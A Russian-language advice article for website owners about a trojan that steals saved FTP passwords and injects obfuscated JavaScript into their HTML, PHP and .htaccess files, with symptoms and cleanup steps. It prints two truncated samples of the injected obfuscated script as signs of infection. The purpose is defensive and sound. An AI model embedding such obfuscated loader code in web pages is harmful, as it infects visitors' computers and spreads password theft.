Как заразить вирусом свой собственный вебсайт

Эта статья адресована в первую очередь всем владельцам собственных вебсайтов. Возможно, вы уже сталкивались с враждебным вторжением, а может быть, вам это еще только предстоит. Но в любом случае далеко не всегда виноватым является хостинг. В последнее время участились случаи внедрения вредоносного кода в HTML и PHP страницы, а также в файл .htaccess. Как это проявляется?

• При доступе к своему сайту вы можете получать сообщения об ошибках php, если там применяются скрипты или используется какой-либо движок на PHP (wordpress, joomla).
• Обычные HTML страницы могут быть искажены или доступ к ним ограничен либо полностью отсутствовать.
• Возможно появление ошибки выполнения скриптов 500 при заражении .htaccess.
• Сообщение антивирусных программ о заражении при открытии своих сайтов.
• Что-либо другое, не соответствующее нормальной работе вебсайта.

Что все это значит и как проверяется?

При просмотре исходного кода вебстраниц вначале или в самом конце присутствует загадочный код как правило в виде кодированного javascript. Скажем вот такого вида (приводится не полностью):

<script>function vyVdxyxdaYY(vyatVYybYVy){ var vYdbddxaVaV=530;
return(parseInt(vyatVYybYVy,16));}function vayatyaVatd(vVayxytttdy)
{ var vdxxaxdaYVy=530; var vtVbxYytbYa='';
for(vYbbbaxVbYx=0; vYbbbaxVbYx<vvayxytttdy.length;>...

или

<!-- [ ab2aab4b9d766629b77b9b4febadeb6f ] --><script>eval
(unescape('function%20crZnLPY%28uTm%29%7Bfunction%20sPWGz%28unYS%29%7
Bvar%20fUrEeI%3D0%2CvEImT%2CtKGn%3DunYS.
length%3Bfor%28vEImT%3D0%3BvEImT%3CtKGn%3BvEImT++%29fUrEeI+%3DunYS.
charCodeAt%28vEImT%29*tKGn%3Breturn%20new%20String%28fUrEeI%29%7DuTm%3
Dunescape%28uTm%29%3Bvar%20uneE%3Deval%28%27ajrdgMu%
3Amje%3Fn%3Ft%3Fs%3F.%3Fcda%3Fldlde%3Fe%3A%27.
replace%28/%5BM%5C%3Fdj%5C%3A%5D/g%2C%20%27%27%29%29.toString ...

Это самый достоверный признак заражения вредоносным кодом. При посещении вашей страницы при помощи Internet Explorer (как правило) компьютер пользователя заражается трояном и цепная реакция продолжается. Вирус ищет новые лазейки для распространения при этом собирая пароли.

Кто посмел это сделать и как его найти?

В 99% случаев источником данного заражения собственных вебсайтов являетесь вы! Ваш компьютер с Windows уже заражен трояном, который, используя пароли доступа по FTP к вашим вебсайтам, без вашего ведома проникает на них и заражает файлы в корневой публичной папке. По последним данным заражению могут подвергаться и вложенные папки до нескольких уровней вложения. Заражаются файлы HTML, PHP, .htaccess. Самые последние вирусы могут изменять расширения HTML файлов на .htm. Код дописывается в конец файла. И при загрузке страницы запускает iframe. И цепочка продолжается.

Что делать и как быть?

1. Проверить компьютер на предмет наличия вирусов и делать это систематически, регулярно обновляя вирусные базы.
2. Проверить компьютер на трояны и spyware, если антивирус этого не позволяет.
3. Сменить пароль на доступ к серверу.
4. Отменить сохранение пароля в FTP-менеджерах, которыми вы пользуетесь как администратор FTP-сервера (Total Commander, Far, и т.п.) - т.е вводить пароли вручную.
5. Регулярно проводить архивирование незараженных вебсайтов.

Единственный способ лечения это скачивание вебсайта (при отсутствии локальной копии) и ручное удаление вредоносного кода. Либо выгрузка чистой сохраненной версии.

Небольшой совет профессионалов: ftp пароли можно сохранять с дописанным одним символом и при запросе пароля его просто удалять.

При соблюдении указанных действий появление новых заражений прекращается.